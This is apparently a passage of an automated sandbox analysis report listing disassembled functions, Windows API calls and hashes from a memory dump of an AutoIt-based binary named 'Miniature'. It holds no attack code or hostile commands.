                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C72593
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 531574a05c6d242e8b61c487073bfc0c39c8fda40cba85aff52d5dc44e8c6ba2
                                                                                                                                                                                                                                                                                            • Instruction ID: 77226655ae6708bdd14272296aa6dc8bbc654304a7133a793c1f7ce99b1a4a89
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 531574a05c6d242e8b61c487073bfc0c39c8fda40cba85aff52d5dc44e8c6ba2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01A775640104BBCB08E790C962EFE77A8DF46340F50402A7926A3281DF109F08E7B1
                                                                                                                                                                                                                                                                                            Function 00C725A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C72615
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 37454f7471ac216c741704ba1d44c8ff2ed0ada47237d0d9b7bd134c4fe2b910
                                                                                                                                                                                                                                                                                            • Instruction ID: 678aa6e09e9780b95ad8cd7cc34b21e5482f29699dfd9ac8b5b3b726ff0e7ad6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37454f7471ac216c741704ba1d44c8ff2ed0ada47237d0d9b7bd134c4fe2b910
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1701D675A40104B7CB19E7A0D902EFF77A89F06340F508027B816A3281DB618E09F6B1
                                                                                                                                                                                                                                                                                            Function 00C726B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C72720
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 912c36c531a18d46365ddd2f3060b55c2555c4a618ac286f3777fee4a8ffdbfe
                                                                                                                                                                                                                                                                                            • Instruction ID: b5a5473932cbb7838025ad005b7a30083689eb2fcab7819c7aef37be0f9977d6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 912c36c531a18d46365ddd2f3060b55c2555c4a618ac286f3777fee4a8ffdbfe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F0AF75A40214ABCB08B7A4DC52FFE77BCAF06790F44492AB476A32C1DF615908E660
                                                                                                                                                                                                                                                                                            Function 00C71461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C7146F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                            • Opcode ID: ec3289e074fbf64fe095fc69fa66c108906b44edd0ac7dc3444d459e0b84dc04
                                                                                                                                                                                                                                                                                            • Instruction ID: 82e796a15a777649d34b6b31dc5285a6a823ef55d290471d93be4978a5f7f8b0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec3289e074fbf64fe095fc69fa66c108906b44edd0ac7dc3444d459e0b84dc04
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8E0D83235831536D2103794AC03FCD76849F06B65F21482AF78A658C28EE224906299
                                                                                                                                                                                                                                                                                            Function 00C310B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C310E2,?,?,?,00C1100A), ref: 00C2FAD9
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C310E6
                                                                                                                                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C310F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C310F0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                            • Opcode ID: d92c178f797e929b427ccad6b90422bf3182c5c47b9377cf0d27bdef3e4cd416
                                                                                                                                                                                                                                                                                            • Instruction ID: 30c9b7897d135dadb914c287f8d5fdee3dab2361cc6def31a50ca7f14116cd4b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d92c178f797e929b427ccad6b90422bf3182c5c47b9377cf0d27bdef3e4cd416
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2E06DB06003908FD3209F24E9053CABBE8AB04345F14892DE886C3651EBB4E884DBA1
                                                                                                                                                                                                                                                                                            Function 00C839D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C839F0
                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C83A05
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                            • Opcode ID: 288fc47394df452b194e5f66df9c8ee6f4600db2941a793e263487e7d18f4609
                                                                                                                                                                                                                                                                                            • Instruction ID: 77ce259b53536c15787bb3793d2e7a931ded09265c801a61e2e38b1f92a62cc0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 288fc47394df452b194e5f66df9c8ee6f4600db2941a793e263487e7d18f4609
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1D05EF250032867DA20A7649C4EFCF7A6CDB45715F0003A1BA6792091EAB0DA85CB90
                                                                                                                                                                                                                                                                                            Function 00CA2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA2E08
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00CA2E0F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7F292: Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                            • Opcode ID: c1014e85bd6dcfe97601c7e0bf9ef00ef231432759a25271022aaff23f5afa90
                                                                                                                                                                                                                                                                                            • Instruction ID: 0d5e53d67fff29ed8d8ce7a5eca0d17395456cc754d31bf47ded52a3ff1f1084
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1014e85bd6dcfe97601c7e0bf9ef00ef231432759a25271022aaff23f5afa90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD0A9313853006AE228A370AC0BFCA3A209B01B04F114825B30BAB5C0C8A068008684
                                                                                                                                                                                                                                                                                            Function 00CA2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA2DC8
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CA2DDB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7F292: Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                            • Opcode ID: cd5074b373af9c859e5813a9c55629248192d9c5a336a4aeeed7703ca4e30531
                                                                                                                                                                                                                                                                                            • Instruction ID: 3d49254e58b3fe45eb0c4222e69656d2be9de7b830e6df31915aae2ba65fa145
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd5074b373af9c859e5813a9c55629248192d9c5a336a4aeeed7703ca4e30531
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A935388300A6E228A370AC0BFDA3A209B00B04F114825B30BAB5C0C8A068008680
                                                                                                                                                                                                                                                                                            Function 00C4C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C4C213
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C4C221
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4C27C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 690481504abb40e341cea5dc9935fc17f2bc86d0f288455a0fc2c7a6d3f6a6c0
                                                                                                                                                                                                                                                                                            • Instruction ID: 8559142f4c4c6e70d72f026a269039d24f3425eab5f7b7cfb45f6a21b97ac18e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 690481504abb40e341cea5dc9935fc17f2bc86d0f288455a0fc2c7a6d3f6a6c0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1641D530602206AFDB718FE5C884BAE7BA5BF51720F244169F8659B1B1DBF08E01DB60